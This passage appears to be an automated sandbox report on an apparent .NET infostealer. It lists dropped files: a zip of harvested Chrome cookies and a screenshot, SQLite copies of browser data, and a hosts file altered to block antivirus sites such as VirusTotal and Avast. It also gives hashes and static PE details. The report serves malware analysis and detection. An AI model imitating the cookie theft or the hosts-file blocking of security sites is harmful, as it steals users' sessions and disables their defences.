Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Fke9TkbC12tBAtr.ligma

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	687473
Entropy (8bit):	7.997392352506427
Encrypted:	true
SSDEEP:	12288:MrlMkn+92Of4ai/iCJhJxCKQV7lQwGq45+fEq2mFgSTcFL32+:Gn+1f5iqC9xCp8mxTcl3L
MD5:	0837DDAEB3D6C76E37AE27CAC1A9EC41
SHA1:	46D9C8D7D9A88D2C3A02EE2E86457C29EA30A244
SHA-256:	0FF28EA76B62DEF8A1CA2D8F97EB36343E23A272028A342B9116FD154E8FDACE
SHA-512:	0218D16AA86DCD5757E16737C1AA3E99639FE4CC85285957E3AFFF8BFED0053216EC58B306DCB33BAE8AB587989B6195E77CDA2F7D11C81D2AF43AD12E8B5068
Malicious:	false
Preview:	PK...........Y?..>....!...#...Browsers\Cookies\Chrome Cookies.txt}.Ar.0...u..(......J.RA..I..A..D....t...e....g.&k...+..R.2....8.1.e>s.D0..`.3.....'`6w....l (.z...7..+..+....:a.gk.....y....(t..e.I....../..Ex.+....,.M.../P>>.t3.........3..b..=.DI.]u..\|Y....s.P.z...6.].....:..$.m.?PK...........Y..-.k{..:.......Display\Display.pngt.y<....}...T.JI..K.RId....%YGTH%.:cP!..JF!.[D.....Y..}.c..g..........?.u.\..\..<...<.+..P.......'.PZ&...x......1...h@.&..@Q.....'.[..P.....P.g(KO.8....jq.\|...s.......,.O......,,\|..+V...=e...."....2.9..~E.;.B..-...u..1...B/.\TQ.K.>"R$34..vJav.DG;.K-......cW..Zn4...k.o...9.z.H...7..#.W}..i..o)-.}.2....r/.l/.:..]y.n.x;....om..D...42.V..#lD...I].u.s....x.nMY.w...f.....uM.j..q...O#..?aXd..t...6.........9z."W.0.a...w.k-.Po....r{.Y'eE.Cr.WE.47..UW.U./.(.9....8..im..e......bO..g-.S...S....Y...-v..gVBn..Y..(......T....B............9vy.eZ.@......CL%...R....w._.\|.-.D......{...(.I..r..uw.S\Ky4..V\|...._"...7..S..6...,

C:\Users\user\AppData\Local\Temp\Fke9TkbC12tBAtr\Browsers\Cookies\Chrome Cookies.txt

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.792892974633299
Encrypted:	false
SSDEEP:	6:Pk3rsSQSvxbyv3r4zP9JcrDSLukrTSSIGDRmEksDVD:c7fvvI74TAHSLLXAGDR+U
MD5:	C47EEE503933D7B3AB514A4EBB579448
SHA1:	5A950E03C2C47977657E72B3C483488E1F8F4181
SHA-256:	3E4300F6591F31C3F612127C2384CF60BCAE35FF3060A7562DD8F2AD168C4154
SHA-512:	C3C7C521DDB4DACCF616002C1168264B46FB19C5A55B972CF45CDB3CC7E20E0CF86015371646FFA232426EFB23437367201017A580DE456A87EFBB4751D9121D
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.13343562100717560.1P_JAR.2023-10-05-09...google.com.TRUE./.FALSE.13356781299717612.NID.511=k9tT3q7Yfh1nx_FSl06F5UE_vdaFQreiGKe1aDN83MeveD7PL1RZXva4s-nFc9waQi9LtKavuTIba8MUkoGu58E8E81gwB_TWJ4Ng-LfCvzhem7rNrhZQ2aGvJZ9g2TYhqx2W2O4E7uHQzPk3vuLvMLxFXZsqE6NdAViQDECGpo..

C:\Users\user\AppData\Local\Temp\Fke9TkbC12tBAtr\Display\Display.png

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	704570
Entropy (8bit):	7.928061011057279
Encrypted:	false
SSDEEP:	12288:Gh1JrcIEHjrPYIshYHYYhHVgP8epua6aAwwgR5eB14uStG+svjbsVjps:SJrczHjrYNEheJCDwwuNtds/
MD5:	2521107A6A68CFB2D75C2E41511C3AAC
SHA1:	0B59749CD6EE88A3AEC7EB823BD6BE38BC92F406
SHA-256:	309AD989C3ED089C0C688836F47DB9EA4111F53DF9471A30612764E17C910570
SHA-512:	6F85FF6D21A77C1327E70BF76E8808F1E97B48F75F99CF79C5ED347309F24F3B233A5560D96C95205A0C788AA7349643531D54200B39DB3BE29C385B4CAF6600
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mU.......TWWwu.......<_Uu..t..]...U$.3G...J..&.p..JP@....$#9'.9d%."...j~.7...._c.+.O..y..3.x.;.k.Cy...1g.s....><.4wZjE...:..tO]3t>..a......t>.~.p.O{Q\|.2Q.M.5...=..ON.=....d.+6.h.q.~\|vt>..Y1...G.\;\|.Gk...'Fb.$..@.'.}.0q......P&>T....m.csM..Fb..3...G[&fI.}.....p.....).w=<....w>4k:.x.e...U.o.p..c.....DZ?...3`..[&..o\|..wFt._.....x.....L.L..{5......7..Y.=.{-.o..C.}.v..2......73............+S.h.X9...w.}...'...n....L...i...]qk.9.j.o....m.....8.....r.....`a.......U...7U..~.O...L....j........k.....xb....n.......jr..3..t.>.p..sl.7V..I9{..A........W...:.]......-.4.......jI.Y...R..".R....y..d...5...D..m.qX..u......'wMs.\...\|u.[..M..=....vK.wM..tu....N..g..2.;_Yuw.N.cX.{.Vj;;^....vMf...._KK.....J....W.Vc.....!..w2....vL...\|B.....Ln.E........Wf.<b..}.M...jb..s....~..[]....}X.].....XK.x..f.4.MZ.Z..l.....]7..)O.g..[.}..S...w6...nqi..l~I.)W..Z..z.

C:\Users\user\AppData\Local\Temp\GuYq5GX1e2Hv4DX

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10ylwvwq.2as.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5oovw3bv.0qo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5j0q3cb.e3y.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fff5wlyn.bpz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_haoxmy0g.p43.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj51vj0f.onc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qopysqok.g0a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stfhxdro.vnb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsnt2oot.rlp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3cgorm1.hup.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yt5boswo.tpf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zblsinxz.jf5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\h6iorBURpieElld

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8467337400211222
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
MD5:	7A03CC0EAD0AEFF210C3E60823AAA5EC
SHA1:	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
SHA-256:	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
SHA-512:	8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ncfNQ8Gp2TF2RzX

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tCNRrHNzf8UQ4tL

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Users\user\Desktop\WE8zqotCFj.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2223
Entropy (8bit):	4.573013811987098
Encrypted:	false
SSDEEP:	48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
MD5:	C9901CB0AE22A9ABBD192B692AE4E2EB
SHA1:	12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
SHA-256:	3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
SHA-512:	E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.080249706712877
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	WE8zqotCFj.exe
File size:	236'544 bytes
MD5:	230f75b72d5021a921637929a63cfd79
SHA1:	71af2ee3489d49914f7c7fa4e16e8398e97e0fc8
SHA256:	a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355
SHA512:	3dc11aac2231daf30871d30f43eba3eadf14f3b003dd1f81466cde021b0b59d38c5e9a320e6705b4f5a0eeebf93f9ee5459173e20de2ab3ae3f3e9988819f001
SSDEEP:	6144:xloZMUrIkd8g+EtXHkv/iD4b3gulGELnsyd42X3Wc8b8e1mDQi:DoZrL+EP8b3gulGELnsyd42X3WxYJ
TLSH:	64346C5933B88B17E25F8BBED5B1158F87B1F103E90AF78E0C8895F82412742E949E57
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43b12e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b0dc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x550	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b0c0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
